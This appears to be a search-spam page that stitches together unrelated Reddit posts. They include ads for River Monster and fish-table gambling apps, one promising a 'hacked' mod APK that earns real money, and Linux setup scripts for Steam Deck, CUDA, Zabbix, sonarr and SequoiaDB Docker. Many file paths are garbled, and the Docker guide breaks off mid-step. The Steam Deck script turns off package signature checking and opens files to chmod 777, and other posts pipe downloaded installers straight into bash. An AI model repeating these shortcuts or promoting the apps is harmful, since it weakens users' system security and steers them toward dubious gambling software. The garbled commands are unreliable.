Rivermonster rm.777.net download

Free Books

2008.06.15 05:34 Free Books

A subreddit to post and request links to free books.

2015.03.28 18:22 EjectaFizzy Tokyo 7th Sisters!

/Tokyo7thSisters is a subreddit dedicated to the mobile rhythm/idol raising game, Tokyo 7th Sisters (T7S), developed by Donuts. Will you continue to support the girls at Studio 777 in a future where idols are going out of style?

2014.01.22 23:10 elusivepuck Home of the Gayfish

The place to be for all your Coinye needs and Gayfish shenanigans!

2023.05.02 11:48 rivermonster_game DOWNLOAD RIVERMONSTER APK!

Attention all gaming enthusiasts! 🎮👀
Have you heard about the latest game sensation taking the world by storm? 🌎🌪️
Look no further than Rivermonster APK - the ultimate gaming experience that will keep you hooked for hours on end! 🤩🎉
With stunning graphics, exciting challenges, and endless fun, Rivermonster is the game you've been waiting for! 💥💯
Download the APK now and join the action! 📲🕹️
submitted by rivermonster_game to u/rivermonster_game [link] [comments]

2023.03.30 19:06 Charming_Netapp River Monster Mod 55K Money iOS and Android 2023

River Monster Mod 55K Money iOS and Android 2023


Here you can download and install River Monster App to get the latest version of the official River Monster online casino software on mobile devices for free. River Monster Casino Apk is available via the direct download link below. Follow the instructions in our step-by-step guide on how to properly set up hacked River Monster Gambling App with no ads using the River Monster app for Android that enables you to play a variety of River Monster games and sweepstakes today!
Simply, click on the link below to download River Monster App with a fully working +obb/data file on your Android device or run the River Monster app for iPhone if you’re an iOS user and start playing the latest casino games with attractive visuals and smooth gameplay in the online games provider app.

With rivermonster.net download for Android and iPhone, you can earn real money and add cash into your River Monsters app account just by completing simple tasks and playing entertaining mod apk games on your portable device now.
After finishing River Monster Casino sign-up and depositing River Monster 777 net free cash, you can proceed to play exclusive jackpot, card game, slot, online casino, roulette, fish games, and in-game tournaments.
submitted by Charming_Netapp to techstufflounge [link] [comments]

2023.03.16 03:13 UriEl_M Getting SteamDeck ready for office and gaming use after update/install

Hey everyone, so I use my SteamDeck for everything from office work to gaming, and to do that I have to run some scripts and install packages to enable the SteamDeck to work with things like my printers (an HP laser-jet, and a label thermal-printer), and also connect to my phone via usb to move files, along with other services that I use.
I made an easy list to help me do that, a lot of it is automatic, and some of it requires manual edits because I'm uninformed in how to script some things, some packages are already pre-downloaded (from aur normally), but I'm hoping that this list will help others in making full use of their SteamDeck:

#get system ready after update install

# add # to beginning of ld.so.preload in /etc/

sudo steamos-readonly disable

sudo timedatectl set-timezone America/Chicago
sudo timedatectl set-ntp true

sudo chmod -R 777 /etc/pacman.d/gnupg/gpg.conf
sudo echo "keyserver hkps://keyserver.ubuntu.com" >> /etc/pacman.d/gnupg/gpg.conf

sudo pacman-key --init
sudo pacman-key --refresh-keys
sudo pacman-key --populate
sudo pacman -Sy archlinux-keyring
sudo pacman -Su

# set all SigLevel = Never in /etc/pacman.conf fixes corrupt packages

sudo pacman -S --overwrite \* base-devel
sudo pacman -S --overwrite \* glibc
sudo pacman -S firefox
sudo pacman -S --overwrite \* --needed base-devel

sudo rm -R /valib/pacman/sync
sudo pacman -Sy

cd /home/deck/au
sudo chmod -R 777 /home/deck/au

cd /home/deck/auyay
sudo pacman -U yay-11.3.0-1-x86_64.pkg.tar.zst
cd /home/deck/auexpressvpn
sudo pacman -U --overwrite \* expressvpn-
cd /home/deck/auexpressvpn-gui
sudo pacman -U --overwrite \* expressvpn-gui-0.6.9-1-x86_64.pkg.tar.zst

#add custom.db file into /vacache/pacman/custom/
#edit out custom.db in /etc/pacman.conf

#install printer service

sudo pacman -S --overwrite \* cups
sudo systemctl enable --now cups
sudo pacman -S --overwrite \* system-config-printer
sudo pacman -S --overwrite \* gtk3-print-backends
sudo pacman -S --overwrite \* hplip

#install thermal printer, still need to link ppd downloads/printer...

sudo cp "/home/deck/Downloads/printeLP320 LabelRangePrinter Linux Driver software/ubuntu_LP320_driver_x64/driverastertoLP320" /lib/cups/filterastertoLP320

#install phone driver
cd /home/deck/ausamsung-unified-drive
sudo pacman -U --overwrite \* samsung-unified-driver*
sudo pacman -S --overwrite \* mtpfs
sudo pacman -S --overwrite \* gvfs-mtp
sudo pacman -S --overwrite \* gvfs-gphoto2
cd /home/deck/aujmtpfs/
sudo pacman -U --overwrite \* jmtpfs-0.5-1-x86_64.pkg.tar.xz

#fix linux limits api for packages/builds

sudo mkdir /usinclude/linux
sudo cp /usinclude/limits.h /usinclude/linux/limits.h

#install ifconfig for net commands

sudo pacman -S --overwrite \* net-tools

#auto change mtu at startup to 1420

sudo cp /home/deck/Desktop/scripts/mtuchange.sh /usbin/
sudo chmod 755 /usbin/mtuchange.sh

sudo cp /home/deck/Desktop/scripts/mtuchange.service /etc/systemd/system/
sudo systemctl enable mtuchange.service
sudo systemctl start mtuchange.service


sudo pacman -S linux-neptune-headers

sudo pacman-key --recv-key FBA220DFC880C036 --keyserver keyserver.ubuntu.com

sudo pacman-key --lsign-key FBA220DFC880C036

sudo pacman -U 'https://cdn-mirror.chaotic.cx/chaotic-auchaotic-keyring.pkg.tar.zst' 'https://cdn-mirror.chaotic.cx/chaotic-auchaotic-mirrorlist.pkg.tar.zst'

#Append (adding to the end of the file) to /etc/pacman.conf:

Include = /etc/pacman.d/chaotic-mirrorlist

sudo pacman -Syu

#fix errno error for YAY

sudo cp /usinclude/errno.h /usinclude/linux/


submitted by UriEl_M to SteamDeck [link] [comments]

2022.06.14 17:45 telesritchie Fish Tables

Real money fish game is a digital version of the fish arcade game that you play in parlors. The main difference here is that you can access these games without leaving your house, and they are available on both mobile and desktop devices. Besides that, you might also end up winning more cash prizes in online versions as they have some lucrative bonus offers. Fish tables generally come from China, and initially, big casino software providers started to develop online versions of the game.
It is a fun and exciting experience to enjoy some high-quality fish tables online. You might as well download the blue dragon app to do so. In this app, you can find a variety of fish table games as well as other online casino game genres like poker, blackjack, and slot machines. So, if you want to experience the thrill of playing fish tables, look no further than Blue Dragon.
If you do not want to download the app and try to instantly access these games, you might as well check out platforms like Rivermonster games or Fire Kirin that offers fish table games online. Depending on your choice, you can find legitimate real money fish game titles and enjoy them right away.
More info: https://blue-dragon.games/why-do-you-need-to-play-a-real-money-fish-game/
submitted by telesritchie to u/telesritchie [link] [comments]

2022.05.26 13:50 telesritchie Fish Table Gambling Game Online

Fish Table Gambling Game Online
Real money fish game is a digital version of the fish arcade game that you play in parlors. The main difference here is that you can access these games without leaving your house, and they are available on both mobile and desktop devices. Besides that, you might also end up winning more cash prizes in online versions as they have some lucrative bonus offers. Fish tables generally come from China, and initially, big casino software providers started to develop online versions of the game.
If you do not want to download the app and try to instantly access these games, you might as well check out platforms like Rivermonster games or Fire Kirin that offers fish table gambling game online . Depending on your choice, you can find legitimate real money fish game titles and enjoy them right away.
The rules of the real money fish game are very simple. Regardless of your prior experience in the fish arcade genre, you can learn and implement them easily as you start playing. You need to know the components of the game before starting. So, there is a fish aquarium that has a number of fish in it. On the main screen, there are cannons below the fish tank.
More info: https://blue-dragon.games/why-do-you-need-to-play-a-real-money-fish-game/
submitted by telesritchie to u/telesritchie [link] [comments]

2022.05.04 13:39 Substantial_Leg4738 River Monsters 777

River Monsters 777
If you have any desire to play and bring in cash, you can go to the club and bet cash as well. You can acquire a ton there and, contingent upon your karma, lose a ton. Yet, since the vast majority remain at home today due to the plague, we can't go to the gambling club. So assuming you miss playing club betting, simply download River Monsters 777 Apk and play online club games securely! The application has an assortment of fish games and online opening gambling clubs for you to appreciate.

More Info: https://bitbetwin.az/rivermonste
submitted by Substantial_Leg4738 to u/Substantial_Leg4738 [link] [comments]

2022.03.13 00:19 janissary2016 PyTorch causing problems with CUDA on Colab

I am trying to implement a face extraction model using Colab. For that, I am removing Colab's CUDA to install 10-2 and I'm also installing Anaconda. This is the entirety:
import condacolab, torch, sys, skimage, matplotlib, imageio, plotly, cv2, black, flake8, facenet_pytorch from google.colab import drive drive.mount('/content/gdrive') !git clone https://github.com/Chinmayrane16/ReconNet-PyTorch !cp /content/gdrive/MyDrive/headsegmentation_final2.zip /content/gdrive/MyDrive/3DMM-Fitting-Pytorch.zip /content/ !cp /content/gdrive/MyDrive/Anaconda3.sh . !unzip -qq /content/3DMM-Fitting-Pytorch.zip !unzip -qq /content/ReconNet-PyTorch/images/all\ images/BSDS200.zip !mv /content/ReconNet-PyTorch/*.py /content/ !mkdir results !apt-get update -y !apt-get --purge remove "*cublas*" "cuda*" "nsight*" !wget https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-ubuntu1804.pin !mv cuda-ubuntu1804.pin /etc/apt/preferences.d/cuda-repository-pin-600 !wget https://developer.download.nvidia.com/compute/cuda/10.2/Prod/local_installers/cuda-repo-ubuntu1804-10-2-local-10.2.89-440.33.01_1.0-1_amd64.deb !dpkg -i cuda-repo-ubuntu1804-10-2-local-10.2.89-440.33.01_1.0-1_amd64.deb !apt-key add /vacuda-repo-10-2-local-10.2.89-440.33.01/7fa2af80.pub !apt-get install cuda-10-2 libtorch -y !apt autoremove -y !chmod 777 Anaconda3.sh !./Anaconda3.sh condacolab.install() !conda update conda !conda create -n pytorch3d python=3.9 !conda activate pytorch3d !conda install -c pytorch pytorch=1.9.1 torchvision cudatoolkit=10.2 !conda install -c fvcore -c iopath -c conda-forge fvcore iopath !conda install -c bottler nvidiacub !conda install jupyter !conda install pytorch3d -c pytorch3d pyt_version_str = torch.__version__.split("+")[0].replace(".", "") version_str="".join([f"py3{sys.version_info.minor}_cu", torch.version.cuda.replace(".",""), f"_pyt{pyt_version_str}"]) !pip3 install --no-index --no-cache-dir pytorch3d -f https://dl.fbaipublicfiles.com/pytorch3d/packaging/wheels/{version_str}/download.html !export CUB_HOME=$PWD/cub-1.10.0 !pip3 install "git+https://github.com/facebookresearch/[email protected]" !rm -rf sample_data/ *.sh *.run 
And this is the error I get when I try to run a Python file..
/uslocal/lib/python3.7/site-packages/torchvision/io/image.py:11: UserWarning: Failed to load image Python extension: /uslocal/lib/python3.7/site-packages/torchvision/image.so: undefined symbol: _ZNK2at10TensorBase21__dispatch_contiguousEN3c1012MemoryFormatE warn(f"Failed to load image Python extension: {e}") Traceback (most recent call last): File "fit_single_img.py", line 2, in  from core.options import ImageFittingOptions File "/content/3DMM-Fitting-Pytorch/core/__init__.py", line 1, in  from core.BFM09Model import BFM09ReconModel File "/content/3DMM-Fitting-Pytorch/core/BFM09Model.py", line 5, in  from core.BaseModel import BaseReconModel File "/content/3DMM-Fitting-Pytorch/core/BaseModel.py", line 5, in  from pytorch3d.renderer import ( File "/uslocal/lib/python3.7/site-packages/pytorch3d/rendere__init__.py", line 7, in  from .blending import ( File "/uslocal/lib/python3.7/site-packages/pytorch3d/rendereblending.py", line 11, in  from pytorch3d import _C ImportError: libc10_cuda.so: cannot open shared object file: No such file or directory 
Where am I going wrong?
submitted by janissary2016 to CUDA [link] [comments]

2022.03.11 17:37 zemekisrobert100 Ultra Monster casino download

Ultra Monster casino download
Unbelievable news for players can't get by without their appreciated casino games! The latest games and competitions for fishing are available in Ultra Monster casino download. You should rest assured that these games will match your style of play and address your issues.

If you love casino games yet come up short on time to regularly play them, then, you are impeccably situated. It is doable to play fish games wherever, at whatever point, with Ultra Monster. Web access isn't needed in case you don't have it.
More Info: https://rivermonster.net/
submitted by zemekisrobert100 to u/zemekisrobert100 [link] [comments]

2022.03.10 23:29 janissary2016 PyTorch causing problems with CUDA on Colab

I am trying to implement a face extraction model using Colab. For that, I am removing Colab's CUDA to install 10-2 and I'm also installing Anaconda. This is the entirety:
!pip3 install -q condacolab scikit-image matplotlib imageio plotly opencv-python black 'isort<5' flake8-bugbear flake8-comprehensions facenet-pytorch import condacolab, torch, sys from google.colab import drive drive.mount('/content/gdrive') !git clone https://github.com/Chinmayrane16/ReconNet-PyTorch !cp /content/gdrive/MyDrive/headsegmentation_final2.zip /content/gdrive/MyDrive/3DMM-Fitting-Pytorch.zip /content/ !cp /content/gdrive/MyDrive/Anaconda3.sh . !unzip -qq /content/3DMM-Fitting-Pytorch.zip !unzip -qq /content/ReconNet-PyTorch/images/all\ images/BSDS200.zip !mv /content/ReconNet-PyTorch/*.py /content/ !mkdir results !apt-get update -y !apt-get --purge remove "*cublas*" "cuda*" "nsight*" !wget https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-ubuntu1804.pin !mv cuda-ubuntu1804.pin /etc/apt/preferences.d/cuda-repository-pin-600 !https://developer.download.nvidia.com/compute/cuda/10.2/Prod/local_installers/cuda-repo-ubuntu1804-10-2-local-10.2.89-440.33.01_1.0-1_amd64.deb !dpkg -i cuda-repo-ubuntu1804-10-2-local-10.2.89-440.33.01_1.0-1_amd64.deb !apt-key add /vacuda-repo-10-2-local-10.2.89-440.33.01/7fa2af80.pub !apt-get -y install cuda-10-2 !chmod 777 Anaconda3.sh !./Anaconda3.sh !rm -rf sample_data/ Anaconda3-2021.11-Linux-x86_64.sh cuda_10.2.89_440.33.01_linux.run condacolab.install() !conda update conda !conda create -n pytorch3d python=3.9 !conda activate pytorch3d !conda install -c pytorch pytorch=1.9.1 torchvision cudatoolkit=10.2 !conda install -c fvcore -c iopath -c conda-forge fvcore iopath !conda install -c bottler nvidiacub !conda install jupyter !conda install pytorch3d -c pytorch3d pyt_version_str = torch.__version__.split("+")[0].replace(".", "") version_str="".join([f"py3{sys.version_info.minor}_cu", torch.version.cuda.replace(".",""), f"_pyt{pyt_version_str}"]) !pip3 install --no-index --no-cache-dir pytorch3d -f https://dl.fbaipublicfiles.com/pytorch3d/packaging/wheels/{version_str}/download.html !export CUB_HOME=$PWD/cub-1.10.0 !pip3 install "git+https://github.com/facebookresearch/[email protected]" 
And this is the error I get when I try to run a Python file..
[Errno 2] No such file or directory: '3DMM-Fitting-Pytorch/' /content/3DMM-Fitting-Pytorch /uslocal/lib/python3.7/site-packages/torchvision/io/image.py:11: UserWarning: Failed to load image Python extension: /uslocal/lib/python3.7/site-packages/torchvision/image.so: undefined symbol: _ZNK2at10TensorBase21__dispatch_contiguousEN3c1012MemoryFormatE warn(f"Failed to load image Python extension: {e}") Traceback (most recent call last): File "fit_single_img.py", line 2, in  from core.options import ImageFittingOptions File "/content/3DMM-Fitting-Pytorch/core/__init__.py", line 1, in  from core.BFM09Model import BFM09ReconModel File "/content/3DMM-Fitting-Pytorch/core/BFM09Model.py", line 5, in  from core.BaseModel import BaseReconModel File "/content/3DMM-Fitting-Pytorch/core/BaseModel.py", line 5, in  from pytorch3d.renderer import ( File "/uslocal/lib/python3.7/site-packages/pytorch3d/rendere__init__.py", line 7, in  from .blending import ( File "/uslocal/lib/python3.7/site-packages/pytorch3d/rendereblending.py", line 11, in  from pytorch3d import _C ImportError: libc10_cuda.so: cannot open shared object file: No such file or directory 
Where am I going wrong?
submitted by janissary2016 to CUDA [link] [comments]

2021.11.04 21:34 fellowsnaketeaser Permissions issue with sabnzbd and sonarr

I have got both services running successfully as systemd services, each under their respective user:group.
When sabnzbd finishes a download, it is placed in /valib/sabnzbd/Downloads/complete, sonarr is notified and moves the file to its own media folder.
If, and only if, I set the permissions of the sabnzb complete folder to 777, a security nightmare, especially for a folder where stuff is downloaded to from the internet.
755 is not enough (one should assume that sonar tells the dl client to delete the file, but apparently it tries to delete it on its own, creating a problem). To make things worse, sonarr actually does copy the file over and over again, only to delete it again, once it perceives, that it cannot delete the original file (or thinks it cannot).
So I try to set ACL to the sabnzbd complete folder. But these are ignored.
/v/l/sabnzbd> getfacl Downloads/complete/ # file: Downloads/complete/ # owner: sabnzbd # group: sabnzbd user::rwx user:sonarr:rwx <-- see, sonarr, you could! group::r-x mask::rwx other::r-x 
The service
● sonarr.service - Sonarr Service Loaded: loaded (/uslib/systemd/system/sonarr.service; enabled; vendor preset: disabled) Active: active (running) since Tue 2021-11-02 17:17:21 CET; 2 days ago Main PID: 2278 (mono) Tasks: 17 (limit: 9413) Memory: 1.4G CPU: 1h 15min 48.778s CGroup: /system.slice/sonarr.service └─2278 /usbin/mono --debug /uslib/sonarbin/Sonarr.exe -nobrowser -data=/valib/sonarr Nov 04 21:04:44 darkstar sonarr[2278]: at System.IO.File.Delete (System.String path) [0x0000e] in /build/mono/src/mono/external/corefx/src/System.IO.FileSystem/src/System/IO/File.cs:107 Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Mono.Disk.DiskProvider.TransferFilePatched (System.String source, System.String destination, System.Boolean overwrite, System.Boolean move) [0x00291] in M:\BuildAgent\work\637395> Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Mono.Disk.DiskProvider.MoveFileInternal (System.String source, System.String destination) [0x00098] in M:\BuildAgent\work\63739567f01dbcc2\src\NzbDrone.Mono\Disk\DiskProvider.cs:> Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Common.Disk.DiskProviderBase.MoveFile (System.String source, System.String destination, System.Boolean overwrite) [0x000e1] in M:\BuildAgent\work\63739567f01dbcc2\src\NzbDrone.Co> Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Common.Disk.DiskTransferService.TryMoveFileVerified (System.String sourcePath, System.String targetPath, System.Int64 originalSize) [0x00047] in M:\BuildAgent\work\63739567f01dbc> Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Common.Disk.DiskTransferService.TransferFile (System.String sourcePath, System.String targetPath, NzbDrone.Common.Disk.TransferMode mode, System.Boolean overwrite) [0x004b9] in M> Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Core.MediaFiles.EpisodeFileMovingService.TransferFile (NzbDrone.Core.MediaFiles.EpisodeFile episodeFile, NzbDrone.Core.Tv.Series series, System.Collections.Generic.List`1[T] epis> Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Core.MediaFiles.EpisodeFileMovingService.MoveEpisodeFile (NzbDrone.Core.MediaFiles.EpisodeFile episodeFile, NzbDrone.Core.Parser.Model.LocalEpisode localEpisode) [0x00046] in M:\> Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Core.MediaFiles.UpgradeMediaFileService.UpgradeEpisodeFile (NzbDrone.Core.MediaFiles.EpisodeFile episodeFile, NzbDrone.Core.Parser.Model.LocalEpisode localEpisode, System.Boolean> Nov 04 21:04:44 darkstar sonarr[2278]: at NzbDrone.Core.MediaFiles.EpisodeImport.ImportApprovedEpisodes.Import (System.Collections.Generic.List`1[T] decisions, System.Boolean newDownload, NzbDrone.Core.Download.DownloadClientItem> 
Now this:
[email protected] /v/l/sabnzbd> sudo -u sabnzbd -s [email protected] ~> cd Downloads/complete/ [email protected] ~/D/complete> touch testfile [email protected] ~/D/complete> exit [email protected] /v/l/sabnzbd> sudo -u sonarr -s [email protected] /v/l/sabnzbd> rm Downloads/complete/testfile 
and the file is gone. So my guess is, that .net's System.IO.File.Delete being a Windows implementation checks the basic unix permissions only and is too timid to even try to delete, where it actually could due to the ACL.
How do you guys get around this?
submitted by fellowsnaketeaser to sonarr [link] [comments]

2021.05.15 04:44 backtickbot https://np.reddit.com/r/docker/comments/nbsn7m/i_need_help_with_aspnetcore_net5_react_docker/gy6b5po/

I've made this updated dockerfile from the tutorial for the dotnet core react project.
It costed me about a night's worth of time. There were mainly 2 errors.
One error was: The command '/bin/sh -c apt-get install -y nodejs' returned a non-zero code: 100 and E: Unable to locate package nodejs To solve this, had to add sudo -E bash - after the curl and also updated the node's version.
Then there was another error, which couldn't find the curl or sudo, so had to download the curl and sudo.
After that there was another error when running the dotnet publish. npm ERR! Failed at the [email protected] build script.. I didn't know why this error was throwing, so my guess was that file permission had something to do with it. So added RUN sudo chmod -R 777 ClientApp after the publish worked.
There was also a build error in my pc when I ran build DotNetCoreReact.csproj -c Release -o /app/build directly in my console. To solve it I removed these lines from the project's .csproj file.
These are just the summary of what I had to do to solve what. I'm not sure whether or not they are the proper way and most optimized way to handle these. At least the image is building and container is working properly.
Here is the full dockerfile.
#See https://aka.ms/containerfastmode to understand how Visual Studio uses this Dockerfile to build your images for faster debugging. FROM mcr.microsoft.com/dotnet/aspnet:5.0 AS base WORKDIR /app EXPOSE 80 EXPOSE 443 RUN apt-get update && apt-get -y install sudo && apt-get -y install curl RUN curl -sL https://deb.nodesource.com/setup_12.x sudo -E bash - RUN apt-get install -y nodejs # FROM mcr.microsoft.com/dotnet/core/sdk:3.1-buster AS build FROM mcr.microsoft.com/dotnet/sdk:5.0 AS build # installing sudo, because we need it for nodejs RUN apt-get update && apt-get -y install sudo && apt-get -y install curl # installing nodejs RUN curl -sL https://deb.nodesource.com/setup_12.x sudo -E bash - RUN apt-get install -y nodejs WORKDIR /src COPY ["DotNetCoreReact.csproj", "/"] RUN dotnet restore "/DotNetCoreReact.csproj" COPY . . WORKDIR "/src" RUN sudo chmod -R 777 ClientApp RUN dotnet build "DotNetCoreReact.csproj" -c Release -o /app/build FROM build AS publish RUN dotnet publish "DotNetCoreReact.csproj" -c Release -o /app/publish FROM base AS final WORKDIR /app COPY --from=publish /app/publish . ENTRYPOINT ["dotnet", "DotNetCoreReact.dll"] # building the image # sudo docker build -t reactdotnetimg . # running the container # sudo docker run -it --name=reactdotnet --rm -p8010:80 reactdotnetimg 
submitted by backtickbot to backtickbot [link] [comments]

2021.02.11 02:32 Robynb1 Monitoring Internet Connectivity with Zabbix Part 1

Monitoring Internet Connectivity with Zabbix Part 1
Edit - Fixed typo

So recently I decided to monitor my internet connection. This is part one. The second part will be adding to Grafana.
I first started off by searching for existing templates in Zabbix Share
Unfortunately all of them were broken as far as I could tell. After pocking around a bit I eventually I settled on this one. since it was only half broken. So I set about rewriting most of the script and adding a check for connectivity by pinging
You can download the script and template here
If you want to set this up yourself follow the instructions below.
  1. Install SpeedTest CLI (note speedtest.net has its own which uses different switches it will not work with this script.)

sudo apt-get install speedtest-cli 
  1. Run speedtest-cli
    [email protected]:/home/administrator# speedtest-cli
Retrieving speedtest.net configuration... Testing from MY ISP (NNN.NNN.NNN.NNN)... Retrieving speedtest.net server list... Selecting best server based on ping... Hosted by S&T Communications (Colby, KS) [2046.18 km]: 40.067 ms Testing download speed................................................................................ Download: 262.24 Mbit/s Testing upload speed...................................................................................................... Upload: 4.04 Mbit/s
if you get something similar to above great its working!
  1. Create a folder for the script to live in.
    sudo mkdir /etc/zabbix/script
  2. Give it permissions
    sudo chmod 777 /etc/zabbix/script
  3. Copy the script over. This can either be done from the command line or with a utility such as WinSCP
  4. Make the script executable
    sudo chmod +x /etc/zabbix/script/spd.sh
  5. Now that we have the script setup we need to process the data it is getting back from speedtest-cli. In the case of my version of this script its using JSON. If this is not already installed run the command below.
    sudo apt-get install jq
  6. Next we need to be able to send the data to Zabbix. This will require installing Zabbix_send (note Zabbix send is not installed by default on monitored hosts.)
    sudo apt-get install zabbix_send
  7. Now that we can send the data to Zabbix we will need a template setup so Zabbix knows what to do with it. Sign into your Zabbix webadmin then click Configuration >> Templates

Click Import in the upper Right Hand corner
select the file to import
Then Click Import.
Next we will need to link it to the appropriate machine.

Click Hosts under Configuration
click the link for the device you setup the script on.
click the templates tab
click select
check speedtest
click select
confirm the linked templates then click update
  1. With the Zabbix template now setup we can test the script.
    /bin/bash /etc/zabbix/script/spd.sh
you should have something similar to below
checking speedtest and report back to zabbix, please wait... 
info from server: "processed: 8; failed: 0; total: 8; seconds spent: 0.000489" sent: 8; skipped: 0; total: 8 [email protected]:/home/administrator#
If something shows failed check the above steps to see if you missed anything.
  1. Finally we need to schedule a couple tasks so this script runs.
to schedule a task you will need to run crontab
crontab -e 
If this is the first time it will prompt you to select an editor
no crontab for administrator - using an empty one Select an editor. To change later, run 'select-editor'. 
1. /bin/nano <---- easiest 2. /usbin/vim.basic 3. /usbin/vim.tiny 4. /bin/ed
Choose 1-4 [1]: 
Pick your editor. I used nano. Enter the following lines at the end of the file then save.
*/20 * * * * /bin/bash /etc/zabbix/script/spd.sh # runs every 20 minites 
0 3 * * * find /tmp/*.log -ctime +1 -exec rm {} ; # runs daily at 3 AM
If you don’t like the intervals I have set above a good place to generate the cron timings is here.
  1. Finished
If everything worked You should be getting data pushed to Zabbix every 20 minutes ($:00, $:20, $:40)

link to this same post on my blog. Hiding since I don't want people downvoting thinking its blog spam. I don't care if you click it this is so people don't think I stole it.
submitted by Robynb1 to homelab [link] [comments]

2019.02.28 04:45 sequoiadb How to implement rapid deployment of SequoiaDB cluster with Docker

How to implement rapid deployment of SequoiaDB cluster with Docker

Container technology, represented by Docker and Rocket, is becoming more and more popular. It changes the way companies and users create, publish, and use distributed applications, and it will bring its value to the cloud computing industry in the next five years. The reasons for its attractiveness are as follows:

1)Resource Independence and Isolation

Resource isolation is the most basic requirement of cloud computing platforms. Docker limits the hardware resources and software running environment through the Linux namespace, cgroup, and is isolated from other applications on the host machine, so it does not affect each other.

Different applications and service are “ship” and “unship” with the unit of container. Thousands of “containers” are arranged on the “container” ship. Different companies, different types of “goods” (programs, components, operating environments, dependencies required to run applications) remain independent.

2) Environmental Consistency

The development engineer builds a docker image after finishing the application development. Based on this image, the container is packaged with various “parts of goods” (programs, components, operating environment, dependencies required to run the application). No matter where the container is: development environment, test environment or production environment, you can ensure that the number of “goods” in the container is exactly the same, the software package will not be missing in the test environment, and the environmental variables will not be forgotten in the production environment. The development and production environment will not cause the application to run abnormally due to the dependency of installing different versions. This consistency is benefited by the fact that the “build docker image” is already sealed into the “container” when delivery, and each link is transporting this complete “container” that does not need to be split and merged.

3) Lightweight

Compared to traditional virtualization technology (VM), the performance loss of using docker on cpu, memory, disk IO, network IO has the same level or even better performance. The rapid creation, start-up, and destruction of containers have received a lot of praise.

4)Build Once, Run Everywhere

This feature has attracted many people. When the “goods” (application) is exchanged between “cars”, “trains”, “ships” (private clouds, public clouds, etc.), it only need to migrate the “docker container” which conform to the standard specifications and handling mode, which has reduced the time-consuming and labor-intensive manual “loading and unloading” (online and off-line applications), resulting in huge time labor cost savings. This feature makes it possible for only a few operators in the future to operate the container clusters for ultra-large-scale loading online applications, just as a few machine operators in the 1960s can unload a 10,000-class container ship in a few hours.

Container technology nowadays is also widely used in the database field. Its “Build Once, Run Everywhere” feature greatly reduces the time spent on installing the configuration database environment. Because even for DBAs who have been working with databases for many years, installing the configuration database environment is still a seemingly simple but often a complex work. Of course, other advantages of container technology are also well used in the application of databases.

As an excellent domestic distributed NewSQL database, SequoiaDB has been recognized by more and more users. This article takes Docker as an example, focusing on how to quickly build a SequoiaDB image with Dockerfile, and how to use the container to quickly build and start the SequoiaDB cluster to application system.

Build SequoiaDB image

How to install docker and configure repositories is not the focus of this article. There are many related technical articles on the Internet. It should be pointed out that this article uses Aliyun Repository, because the speed of uploading images to Docker official repository is unflattering. How to register and use the Aliyun Repository can refer to the article (http://www.jb51.net/article/123101.htm).

STEP 1: Create Dockerfile using following simple statements:
# Sequoiadb DOCKERFILES PROJECT # -------------------------- # This is the Dockerfile for Sequoiadb 2.8.4 # # REQUIRED FILES TO BUILD THIS IMAGE # ---------------------------------- # (1) sequoiadb-2.8.4-linux_x86_64-enterprise-installer.run # (2) installSDB.sh # # HOW TO BUILD THIS IMAGE # ----------------------- # Put all downloaded files in the same directory as this Dockerfile # Run: # $ sudo docker build -t sequoiadb:2.8.4 . # # Pull base image FROM ubuntu # Environment variables required for this build ENV INSTALL_BIN_FILE="sequoiadb-2.8.4-linux_x86_64-enterprise-installer.run" \ INSTALL_SDB_SCRIPT="installSDB.sh" \ INSTALL_DIR="/opt/sequoiadb" # Copy binaries ADD $INSTALL_BIN_FILE $INSTALL_SDB_SCRIPT $INSTALL_DI # Install SDB software binaries RUN chmod 755 $INSTALL_DI$INSTALL_SDB_SCRIPT \ && $INSTALL_DI$INSTALL_SDB_SCRIPT \ && rm $INSTALL_DI$INSTALL_SDB_SCRIPT 
The content of the installSDB.sh script are as follows:
chmod 755 $INSTALL_DI$INSTALL_BIN_FILE $INSTALL_DI$INSTALL_BIN_FILE --mode unattended rm $INSTALL_DI$INSTALL_BIN_FILE echo 'service sdbcm start' >> /root/.bashrc 
It should to be noted that this example uses SequoiaDB Enterprise Edition 2.8.4. You can also download the community version from the official website of SequoiaDB (select tar package, download and extract), and replace the media name in this example. SequoiaDB website download address: http://download.sequoiadb.com/cn/

STEP 2: Create an image
The root user executes:
Docker build -tsequoiadb: 2.8.4 .If you are a normal user, use sudo:Sudo docker build -tsequoiadb: 2.8.4 .

STEP3: Login to Aliyun Repository
Docker login — username=xxxregistry.cn-hangzhou.aliyuncs.comWhere xxx is the account you registered with Alibaba Cloud.

STEP4: View local SequoiaDB image id
docker images

STEP5: Mark local image and put it into Aliyun Repository
04dc528f2a6f is the author’s local sequoiadb image id, registry.cn-hangzhou.aliyuncs.com is the Aliyun Repository address, 508mars is the author’s name in Aliyun, SequoiaDB is the image name, and latest is the tag.

Start SequoiaDB cluster with container

Docker’s network defaults to bridge mode, and containers in bridge mode have the following characteristics:
1) Containers in the same host can ping each other
2) Containers in different hosts can not ping each other

However, the SequoiaDB cluster requires interoperability between all nodes, so if the container with SequoiaDB is running on different hosts, the default network mode of docker is obviously inappropriate. There are many ways to solve the connectivity problem between different host containers. This article only introduces the weave virtual network solution, because weave also provides a DNS server function. When deploying SequoiaDB clusters with containers using this function, it is no longer necessary to modify /etc/hosts inside each container, which greatly simplifies the steps of automated deployment.

STEP1: Install the weave network
Curl -s -L git.io/weave -o /uslocal/bin/weave
Chmod a+x /uslocal/bin/weave
It needs to install on all hosts, the author uses three virtual machines as hosts: sdb1, sdb2 and sdb3.

STEP2: Start the weave network
Weave launch
The weave image will be downloaded the first time it is started.

STEP3: Download the SequoiaDB image from Aliyun Repository
Docker pull registry.cn-hangzhou.aliyuncs.com/508mars/sequoiadb

STEP4: Create a docker mounted volume on all hosts
Cd /home/sdbadmin
Mkdir -p data/disk1 data/disk2 data/disk3
Mkdir -p conf/local
Chmod -R 777 data
Chmod -R 777 conf
